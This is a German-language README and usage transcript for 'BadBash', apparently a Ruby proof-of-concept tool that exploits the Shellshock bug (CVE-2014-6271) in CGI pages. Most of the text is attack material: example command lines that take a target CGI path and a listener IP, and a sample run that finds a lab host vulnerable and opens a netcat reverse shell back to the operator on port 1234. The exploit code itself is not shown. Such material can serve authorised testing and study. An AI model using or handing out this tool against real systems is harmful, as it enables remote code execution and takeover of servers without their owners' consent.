
CVE-2014-6271 (ShellShock) RCE PoC-Tool
CVE-2014-6271 (ShellShock) RCE PoC-Werkzeug
======= BadBash ist ein CVE-2014-6271 RCE Exploit-Werkzeug. Die Basisversion überprüft nur die HTTP CGI-Seite und bietet nur eine netcat Reverse-Shell auf Port 1234.
Entwickler : Andy Yang Version : 0.1.0 Lizenz : GPLv3
Original GitHub-Projekt : https://github.com/RainMak3r/Rainstorm
================================================================================================ RainMak3r@Could:~/Desktop# ruby BadBash.rb -h
BadBash - CVE-2014-6271 RCE-Werkzeug von Andy Yang Basisversion überprüft nur HTTP-Seiten Basisversion bietet nur eine netcat Reverse-Shell auf Port 1234
BEISPIELVERWENDUNG:
./BBash.rb -t 'www.target.com/cgi-folder/cgi.sh' -d '127.0.0.1'
./BBash.rb -t '10.0.0.1/cgi-folder/cgi.sh' -d '127.0.0.1'
-t, --Target CGI path Vollständiger Pfad der CGI-Seite
-d, --Destination IP Ihre IP-Adresse, die auf eine eingehende Verbindung wartet
-h, --help Hilfe anzeigen
RainMak3r@Could:~/Desktop#ruby BadBash.rb -t '172.16.235.140/cgi-bin/Andy.sh' -d '172.16.189.1'
[Info] Prüfe, ob das Ziel verwundbar ist........
[Info] Dies kann bis zu 10 Sekunden dauern........
[Info] Ziel ist verwundbar!!!
[Info] Bitte verwenden Sie NC, um auf Port 1234 auf eine Reverse-Shell zu lauschen..........
[Info] Führe Exploit für eine Reverse-Shell aus, um über netcat mit 172.16.189.1:1234 zu verbinden ..........